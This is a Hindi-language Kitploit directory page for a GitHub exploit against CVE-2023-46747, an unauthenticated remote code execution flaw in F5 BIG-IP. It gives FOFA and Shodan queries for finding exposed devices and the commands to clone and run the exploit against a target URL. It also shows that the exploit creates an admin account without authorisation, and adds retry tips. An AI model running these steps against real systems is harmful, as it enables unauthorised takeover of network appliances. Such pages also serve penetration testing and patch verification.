Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46747-RCE — f5-big-ip RCE cve-2023-46747 के लिए एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/w01fh4cker/cve-2023-46747-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubw01fh4cker/cve-2023-46747-rce

CVE-2023-46747-RCE

f5-big-ip RCE cve-2023-46747 के लिए एक्सप्लॉइट

रिपॉजिटरी देखें
209471 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

भेद्यता विवरण

fofa:

root@kitploit:~
(title="BIG-IP®" || icon_hash="-335242539")

shodan

root@kitploit:~
title:"BIG-IP®"

प्रभावित संस्करण

https://my.f5.com/manage/s/article/K000137353

भेद्यता पुनरुत्पादन

  1. इस समय, यहां उपयोगकर्ता केवल admin है: image

  2. स्क्रिप्ट निष्पादित करें:

root@kitploit:~
git clone https://github.com/W01fh4cker/CVE-2023-46747-RCE.git
cd CVE-2023-46747-RCE
pip install -r requirements.txt
python CVE-2023-46747-RCE.py -u https://192.168.161.190
# python CVE-2023-46747-RCE.py -u https://192.168.161.190 -p http://127.0.0.1:7890

कमांड सफलतापूर्वक निष्पादित हुआ:
image

  1. यहां बिना प्राधिकरण के एक नया उपयोगकर्ता सफलतापूर्वक बनाया गया: image

कमी

कुछ संस्करणों में शोषण विफल हो जाता है, संदर्भ: https://twitter.com/joel_land/status/1729147886615818732.

प्रश्नोत्तर

  1. प्रश्न: टोकन प्राप्ति विफल?
    उत्तर: यह नहीं कहा जा सकता कि परीक्षण साइट में कोई भेद्यता नहीं होनी चाहिए, क्योंकि बिना प्राधिकरण के उपयोगकर्ता बनाना 100% सफल नहीं है। कभी-कभी कुछ कारणों से पहले चरण में आप उपयोगकर्ता नहीं बनाते, इसलिए दूसरे चरण में टोकन प्राप्त नहीं किया जा सकता। इसलिए, मेरा सुझाव है कि कुछ और बार प्रयास करें। यदि यह काम नहीं करता है, तो इसका मतलब हो सकता है कि वास्तव में कोई भेद्यता नहीं है।

अलग बात

आप F5 BIG-IP संस्करण जानकारी एकत्र करने के लिए इस स्क्रिप्ट https://github.com/BishopFox/bigip-scanner का उपयोग कर सकते हैं। यह बहुत अच्छा है!

संदर्भ

https://github.com/projectdiscovery/nuclei-templates/pull/8500
https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747

टूल डाउनलोड करें